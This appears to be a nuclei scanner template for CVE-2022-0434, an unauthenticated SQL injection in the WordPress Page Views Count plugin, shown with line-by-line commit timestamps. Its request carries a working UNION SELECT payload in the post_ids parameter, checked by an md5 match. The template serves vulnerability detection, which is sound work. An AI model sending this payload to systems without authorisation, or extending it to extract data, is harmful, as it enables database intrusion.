nuclei-templates/cves/2022/CVE-2022-0434.yaml

38 lines
958 B
YAML
Raw Normal View History

2022-09-29 11:51:03 +00:00
id: CVE-2022-0434
info:
2022-10-12 09:05:29 +00:00
name: Page Views Count < 2.4.15 - Unauthenticated SQL Injection
2022-09-29 11:51:03 +00:00
author: theamanrawat
2022-10-12 09:05:29 +00:00
severity: critical
2022-09-29 11:51:03 +00:00
description: |
Unauthenticated SQL Injection in WordPress Page Views Count Plugin (versions < 2.4.15).
reference:
- https://wpscan.com/vulnerability/be895016-7365-4ce4-a54f-f36d0ef2d6f1
- https://wordpress.org/plugins/page-views-count/
2022-10-12 09:05:29 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-0434
2022-09-29 11:51:03 +00:00
classification:
cve-id: CVE-2022-0434
metadata:
verified: true
2022-10-12 09:05:29 +00:00
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wpscan,unauth
variables:
num: "999999999"
2022-09-29 11:51:03 +00:00
requests:
- raw:
- |
2022-10-12 09:05:29 +00:00
GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5({{num}}),null,null%20--%20g HTTP/1.1
2022-09-29 11:51:03 +00:00
Host: {{Hostname}}
matchers-condition: and
matchers:
2022-10-12 09:05:29 +00:00
- type: word
2022-09-29 11:51:03 +00:00
part: body
2022-10-12 09:05:29 +00:00
words:
- '{{md5(num)}}'
2022-09-29 11:51:03 +00:00
- type: status
status:
2022-10-12 09:05:29 +00:00
- 200